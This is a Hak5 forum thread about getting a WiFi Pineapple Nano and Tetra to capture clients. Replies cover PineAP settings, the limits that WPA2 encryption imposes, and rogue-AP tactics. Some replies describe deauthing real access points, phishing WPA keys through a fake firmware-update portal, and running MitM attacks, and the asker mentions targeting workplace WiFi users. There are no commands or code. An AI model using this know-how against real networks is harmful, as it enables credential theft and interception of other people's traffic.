Jump to content

Why does nobody have the answer for this?


nik321
 Share

Recommended Posts

So the other week I posted TWO threads about my Pineapple Nano and Tetra.

I have not recieved much information on the posts from anyone.

I am just wondering why nobody is able to give me an answer for the fact neither of my devices are capturing clients?

I have watched the YouTube vid by Hak5 on "Going from prime to primeap" - Where he shows you adding the MACs to the Pool, also adding the SSID to the pool, enabling deamon and every check box, and then deauthing everyone off the network...

The deauth DOES NOT WORK. And I am not receiving ANY clients?

Link to comment
Share on other sites

28 minutes ago, nik321 said:

So the other week I posted TWO threads about my Pineapple Nano and Tetra.

I have not recieved much information on the posts from anyone.

I am just wondering why nobody is able to give me an answer for the fact neither of my devices are capturing clients?

I have watched the YouTube vid by Hak5 on "Going from prime to primeap" - Where he shows you adding the MACs to the Pool, also adding the SSID to the pool, enabling deamon and every check box, and then deauthing everyone off the network...

The deauth DOES NOT WORK. And I am not receiving ANY clients?

So there could be a number of reasons for this. Have you tried practicing at home first? Can you associate with the Pineapple manually? Try forgetting your encrypted home AP to avoid auto-connecting to it so you can test. I would start by turning off auto-enable for PineAP if it's on, make sure all check boxes are clear on PineAP page, save settings, then click the arrow at the top, and save settings for boot. Clear any SSIDs currently in the pool, and from filters. Reboot the Pineapple. Then, once the Pineapple is rebooted, confirm it has internet connectivity, and then Enable PineAP before checking any boxes. Once enabled, check of "Allow Associations", "Log Probes", and "Log Associations". Then click the Save button below. This should now allow Associations for any Probes for Open WiFi, and respond to all of them. You will not get auto Associations from WPA/WPA 2 encrypted AP requests. Let me know if this works for you.

Link to comment
Share on other sites

On 7/14/2017 at 4:36 PM, Decoy said:

So there could be a number of reasons for this. Have you tried practicing at home first? Can you associate with the Pineapple manually? Try forgetting your encrypted home AP to avoid auto-connecting to it so you can test. I would start by turning off auto-enable for PineAP if it's on, make sure all check boxes are clear on PineAP page, save settings, then click the arrow at the top, and save settings for boot. Clear any SSIDs currently in the pool, and from filters. Reboot the Pineapple. Then, once the Pineapple is rebooted, confirm it has internet connectivity, and then Enable PineAP before checking any boxes. Once enabled, check of "Allow Associations", "Log Probes", and "Log Associations". Then click the Save button below. This should now allow Associations for any Probes for Open WiFi, and respond to all of them. You will not get auto Associations from WPA/WPA 2 encrypted AP requests. Let me know if this works for you.

Yes sir, practicing at home was my first initial test. But forgetting my home AP would delete the object? Nobody at work is going to click "forget" on their works wifi are they? 
What you said at the end about wont get Auto Associations from WPA/WPA2 AP requests? Well doesn't this just defeat the object? Where I live, I rarely ever see Wifi that us in encrypted these days... Especially office wifi.

Link to comment
Share on other sites

with allow associations checked and continued Deauthing i've been able to get specific targets to connect, but it to does take some effort. And they won't always connect with the SSID i'm deauthing them from usually another SSID they've probe requested and the pineapple responded.

Link to comment
Share on other sites

hey man, pretty new here, but hell I thought I would give replying to this a shot... if anyone wants to correct what I am saying please go ahead, I am here to learn like everybody else.

The problem you are having starts with the way that encypted wireless traffic works... first off you have two parties, they start an encrypted session by sharing with one another their "key", but hell, lets just make this simple... lets say name... son.. and dad..

Now, son and dad trust one another.. and they are able to share a secret code that mom doesnt understand. so everytime son wants to talk to dad... he says "hey dad, this is son... is that you?" and dad says " his son, this is dad".... thereafter they can talk without mum knowing what they are saying.

If the response was to be mom... or sister... or stranger on the street... obviously son wouldnt say anything.

This is the VERY simplified reason that you cant kick someone off an encrypted wireless connection and get them to talk to yours instead...

THE RABBIT HOLE GOES DEEPER...

So... why cant we just call ourself dad? seems simple right?? well... in addition to dad saying he is dad... and son saying he is son... there is a secret that they both share... a secret word.. this secret word is, of course encrypted... but... it is possible to "sniff" the encrypted password and work out what it is by comparing a "dictionary" with its encrypted version of the word... its going to take time, and brainpower, but it is possible.

Thats pretty much the long and short of it... you have a starting point now, and hopefully an understanding of how it works... is it impossible using your tetra to penitrate WPA2 networks... absolutely not. But its a hell of a lot easier to intercept traffic on unencrypted (open) networks at $randomwifihotspot.

The reason nobody replied is because in the short time I have been here, I have seen this question pop up a LOT. and it basically comes down to handing someone with no experience a potentially devistating tool, end epowering them to learn why its not working.

Good luck,

/adhoc

Edited by sysadhoc
spelling
  • Upvote 1
Link to comment
Share on other sites

4 hours ago, sysadhoc said:

hey man, pretty new here, but hell I thought I would give replying to this a shot... if anyone wants to correct what I am saying please go ahead, I am here to learn like everybody else.

The problem you are having starts with the way that encypted wireless traffic works... first off you have two parties, they start an encrypted session by sharing with one another their "key", but hell, lets just make this simple... lets say name... son.. and dad..

Now, son and dad trust one another.. and they are able to share a secret code that mom doesnt understand. so everytime son wants to talk to dad... he says "hey dad, this is son... is that you?" and dad says " his son, this is dad".... thereafter they can talk without mum knowing what they are saying.

If the response was to be mom... or sister... or stranger on the street... obviously son wouldnt say anything.

This is the VERY simplified reason that you cant kick someone off an encrypted wireless connection and get them to talk to yours instead...

THE RABBIT HOLE GOES DEEPER...

So... why cant we just call ourself dad? seems simple right?? well... in addition to dad saying he is dad... and son saying he is son... there is a secret that they both share... a secret word.. this secret word is, of course encrypted... but... it is possible to "sniff" the encrypted password and work out what it is by comparing a "dictionary" with its encrypted version of the word... its going to take time, and brainpower, but it is possible.

Thats pretty much the long and short of it... you have a starting point now, and hopefully an understanding of how it works... is it impossible using your tetra to penitrate WPA2 networks... absolutely not. But its a hell of a lot easier to intercept traffic on unencrypted (open) networks at $randomwifihotspot.

The reason nobody replied is because in the short time I have been here, I have seen this question pop up a LOT. and it basically comes down to handing someone with no experience a potentially devistating tool, end epowering them to learn why its not working.

Good luck,

/adhoc

Firstly, welcome here!! 

Secondly, this reply was awesome mate. Great read. I understand what you are saying and I understand the theory behind it now. It was a good example. From watching the Kah5 videos of Darren in his video labelled "Primer to PrimeAP" - I didn't realise to accomplish that it had to be on an OPEN wifi... As like I stated... How many Wifi's now-a-days are NOT wpa2 encrypted?

But it makes perfect sense now.

Lets say... On someones phone... They have their HOUSE wifi auto connect... So as soon as then get home, it auto connects to their home router which is WPA2 encrypted... but ofcourse it just auto connects because its remembered... but lets say that same phone had JUST come back from starbucks who has an open wifi... And that phone has connected to starbucks (so obviously that is ALSO saved in the phone)

If you set up the TETRA... Would the TETRA pick up the signals for that starbucks wifi? because ofcourse the phone has it saved already and will be sending out probe requests to find it... or would it only work IF i shut the home router off, meaning it couldnt actually connect to it? In other words, if a device is already connected to wifi... Does it stop sending out probe requests for other saved wifi's?

Link to comment
Share on other sites

34 minutes ago, nik321 said:

If you set up the TETRA... Would the TETRA pick up the signals for that starbucks wifi? because ofcourse the phone has it saved already and will be sending out probe requests to find it... or would it only work IF i shut the home router off, meaning it couldnt actually connect to it? In other words, if a device is already connected to wifi... Does it stop sending out probe requests for other saved wifi's?

Depends on the device on when and how often it sends out probes for other saved wifi.  Newer devices normally don't send out the probes when they are connected to a wifi with internet detected.  

The other side is going to be signal strength.  If you are providing better signal then the one they are trying to connect to (ie you are between the device and the router they want to connect to) you'll have a better chance of them trying to connect to your device instead.  This is all assuming they have a saved open wifi and want to try to connect.

There's other ways you can setup the pineapples to fake encrypted wifi networks but i haven't looked much into it myself.  You can look around on the forum there's at least one long thread i've seen that talks about this but it's a much more advance topic and will require a decent learning curve.

  • Upvote 1
Link to comment
Share on other sites

3 hours ago, nik321 said:

But I do know the network key? I am attempting this on my home router

Social engineering is a viable option. There's no way to spoof the 4-way handshake. Look at wifiphisher or fluxion for some examples. You could use the EvilPortal module to serve up a firmware update page, and get the key that way; however this would require deauthing the crap out of the actual wifi AP, and hoping the user clicks on your open hosted version. Some people do...

Link to comment
Share on other sites

11 hours ago, nik321 said:

But I do know the network key? I am attempting this on my home router

If that's the case, then setup the wifi on your pineapple.  Once it's working, you can deauth the legitimate ap, and the clients should hop to your ap.  It's not an exact science though.  Some clients will ignore the deauth packet.  Not sure why though.  Make sure you're sending the deauths from your legitimate ap's mac address.

Link to comment
Share on other sites

Hey nik321, thanks for starting this topic. I've got the exact same questions :)

Does anyone know if there is a tutorial out there that demonstrates how to perform a MitM attack with the pineapple on a WPA network if you have the key?

Link to comment
Share on other sites

If you have the network key, then like I said before, set up the wifi like you would any other access point.  Provide a louder signal than the real access point and deauth the shit out of the real ap.  Once the client connects, run you mitm attacks.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...